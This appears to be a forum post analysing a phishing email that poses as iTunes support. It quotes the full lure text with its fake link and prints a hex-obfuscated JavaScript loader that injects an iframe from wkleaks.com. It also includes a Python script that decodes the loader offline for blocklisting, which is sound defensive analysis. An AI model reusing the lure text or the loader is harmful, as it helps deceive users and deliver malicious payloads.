A friend just got hit with this:
From: iTunes Store
Date: 21 December 2010 05:30
Subject: iTunes account may be suspended.
Dear iTunes Customer,
it is possible that your account password has been stolen,
4 different IP addresses have been used to login to your account
within the last 24 hours. Please visit the bellow link and read
what to do and how to contact support department.
http://www.itunnes.net/itunes/howtocontact.html
iTunes will never ask you for your password or any confidential information.
If your iTunes account is no longer active then you may be a victim
of credit card fraud, please contact our support department following
the instructions at the above link in order to solve this issue.
Thank you,
iTunes Support Department
Aside from the evidently (but, alas, inadequately) bogus URL, when you click through to it you get to some code:
var i,y,x="3c696672616d65207372633d22687474703a2f2f7777772e776b6c65616b732e636f6d2f736d632f687a6871647a62332e70687022206e616d653d2266723122207363726f6c6c696e673d226e6f22206672616d65626f726465723d226e6f2220616c69676e3d2263656e746572223e3c2f696672616d653e0d0a";y='';for(i=0;i
...which deobfuscates to the URL http://www.wkleaks.com/smc/hzhqdzb3.php and opens it in an IFRAME; the contents of that URL are currently blank, at least as far as wget and firefox are concerned.
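The hex blob above can be unpacked offline without running any of the script. The following is an added analysis example (not code from this post, and not the attacker's loader): it pulls long hex-only string literals out of a script fragment, decodes each pair of hex digits to one character (this assumes the cut-off loop does the same byte-per-pair rebuild, which is the usual shape of this packer), and lists the remote resources the decoded markup would load. The LOADER_FRAGMENT below is the quoted snippet reassembled verbatim, including its truncation; the function and class names are my own.

```python
"""Offline decoder for the hex-packed loader quoted above.

Added example (not code from the post or from the attacker's page): it decodes the
string the loader would have assembled and reports which remote resources that
markup injects, without ever evaluating the script.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# The hex string from the quoted loader (its variable x), split only for readability.
HEX_BLOB = (
    "3c696672616d65207372633d22"
    "687474703a2f2f7777772e776b6c65616b732e636f6d"
    "2f736d632f687a6871647a62332e706870"
    "22206e616d653d22667231"
    "22207363726f6c6c696e673d226e6f"
    "22206672616d65626f726465723d226e6f"
    "2220616c69676e3d2263656e746572223e"
    "3c2f696672616d653e0d0a"
)

# The loader fragment exactly as quoted in the post; the JavaScript is cut off there
# too, and this analysis only needs the string literal, not the loop.
LOADER_FRAGMENT = 'var i,y,x="' + HEX_BLOB + '";y=\'\';for(i=0;i'

# A quoted string made purely of hex digits and long enough to hold markup is the
# hallmark of this packer; 40 hex chars is an arbitrary threshold (20 bytes).
HEX_LITERAL = re.compile(r"""["']([0-9a-fA-F]{40,})["']""")


def find_hex_literals(js: str):
    """Return every long hex-only string literal found in a script."""
    return HEX_LITERAL.findall(js)


def decode_hex_blob(blob: str) -> str:
    """Reverse the packer: each pair of hex digits is one byte, one character.

    Assumption: the truncated loop in the quoted snippet rebuilds the string the
    same way (byte per pair); latin-1 maps every byte to a character, so nothing
    is lost even if the blob is not valid UTF-8.
    """
    blob = re.sub(r"\s+", "", blob)
    if len(blob) % 2 or not re.fullmatch(r"[0-9a-fA-F]*", blob):
        raise ValueError("not a clean hex string")
    return bytes.fromhex(blob).decode("latin-1")


class _LoadCollector(HTMLParser):
    """Collect every element in decoded markup that fetches a remote resource."""

    # Tag -> attribute that names the resource it loads.
    LOADERS = {"iframe": "src", "frame": "src", "script": "src",
               "embed": "src", "object": "data"}

    def __init__(self):
        super().__init__()
        self.loads = []

    def handle_starttag(self, tag, attrs):
        attr = self.LOADERS.get(tag)
        if attr:
            value = dict(attrs).get(attr)
            if value:
                self.loads.append((tag, value))


def injected_loads(markup: str):
    """List (tag, url) pairs for every loader element in the markup."""
    collector = _LoadCollector()
    collector.feed(markup)
    return collector.loads


def analyze(js: str) -> dict:
    """Decode every packed literal in a script and summarise what it would inject."""
    decoded = [decode_hex_blob(blob) for blob in find_hex_literals(js)]
    loads = [load for markup in decoded for load in injected_loads(markup)]
    hosts = sorted({urlparse(src).hostname for _, src in loads
                    if urlparse(src).hostname})
    return {"decoded": decoded, "loads": loads, "hosts": hosts}


if __name__ == "__main__":
    report = analyze(LOADER_FRAGMENT)
    for markup in report["decoded"]:
        print("decoded markup:", markup.strip())
    for tag, src in report["loads"]:
        print(f"injects <{tag}> loading {src}")
    print("hosts to block or alert on:", ", ".join(report["hosts"]))
```

Run as a script it prints the reconstructed iframe tag, the URL it points at, and the hostname, which is what you would feed into a proxy blocklist or a DNS alert; the same functions work on any script that uses this hex-string-plus-loop packing, so a long hex literal in page source is worth decoding before deciding a blank-looking page is harmless.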
To keep people interested, it also opens up http://support.apple.com/kb/HT1933 to give the user something to look at.
What do we reckon this is? XSS? Is the page at "wkleaks" meant to send a more interesting payload?